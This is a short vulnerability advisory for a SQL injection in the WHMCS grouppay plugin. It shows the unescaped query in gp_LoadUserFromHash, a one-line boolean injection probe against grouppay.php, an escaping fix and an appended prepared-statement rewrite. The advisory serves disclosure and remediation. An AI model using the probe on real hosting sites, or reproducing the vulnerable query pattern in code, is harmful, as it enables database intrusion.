#######################################################################
Title: WHMCS grouppay plugin SQL Injection <=1.5
Author: HJauditing Employee Tim
E-mail: Tim@HJauditing.com
Web: http://hjauditing.com/
Plugin: http://kadeo.com.au/design-and-development/whmcs-dev/whmcs-modules/72-group-pay.html
#######################################################################

============
Introduction
============
We have found a SQL injection inside the group pay plugin for WHMCS.
A lot of game hosting companies are using this plugin.
The SQL injection is in the function gp_LoadUserFromHash.

============
Exploits
============
- SQL Injection
grouppay.php?hash=%hash%' and '1'='1

============
Code SQL Injection
============
/modules/addons/group_pay/functions_hash.php

function gp_LoadUserFromHash($hash){
    //Kill the Dashes
    $hash = str_replace("-", "", $hash);
    // $hash is placed inside the quoted SQL string without escaping
    $result = mysql_query("SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'");
    if($result){
        $row = mysql_fetch_row($result);
        return $row[0];
    }else{
        return false;
    }
}

============
Fix
============
/modules/addons/group_pay/functions_hash.php

function gp_LoadUserFromHash($hash){
    //Kill the Dashes
    $hash = str_replace("-", "", $hash);
    // Escape the value before it is placed inside the quoted SQL string
    $hash = mysql_real_escape_string($hash);
    $result = mysql_query("SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'");
    if($result){
        $row = mysql_fetch_row($result);
        return $row[0];
    }else{
        return false;
    }
}

#######################################################################
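
A variant of the fix that validates the hash format and uses a bound parameter, as an added example that is not part of the original advisory or the plugin's code. It assumes a mysqli connection passed in as $db and the hypothetical function name gp_LoadUserFromHash_prepared; the 32-hex-character check follows from the query comparing the value against md5() output.

```php
<?php
// Added example, not the plugin's code. $db and the function name are
// assumptions; the table and column names are taken from the query above.

function gp_LoadUserFromHash_prepared(mysqli $db, $hash)
{
    // Reject arrays and other non-strings (e.g. ?hash[]=x) up front.
    if (!is_string($hash)) {
        return false;
    }

    // Kill the dashes, as the original function does.
    $hash = str_replace('-', '', $hash);

    // md5() output is always 32 hex characters, so anything else cannot match.
    if (preg_match('/\A[0-9a-f]{32}\z/i', $hash) !== 1) {
        return false;
    }

    // Bound parameter: the value is sent as data and never parsed as SQL.
    $stmt = $db->prepare(
        'SELECT `id` FROM tblclients WHERE md5(CONCAT(id, email)) = ? LIMIT 1'
    );
    if ($stmt === false) {
        return false;
    }

    $stmt->bind_param('s', $hash);
    if (!$stmt->execute()) {
        $stmt->close();
        return false;
    }

    $stmt->bind_result($id);
    $found = $stmt->fetch();   // true = row, null = no row, false = error
    $stmt->close();

    return $found === true ? $id : false;
}
```

With this version the request from the Exploits section fails the format check and returns false before any query is issued.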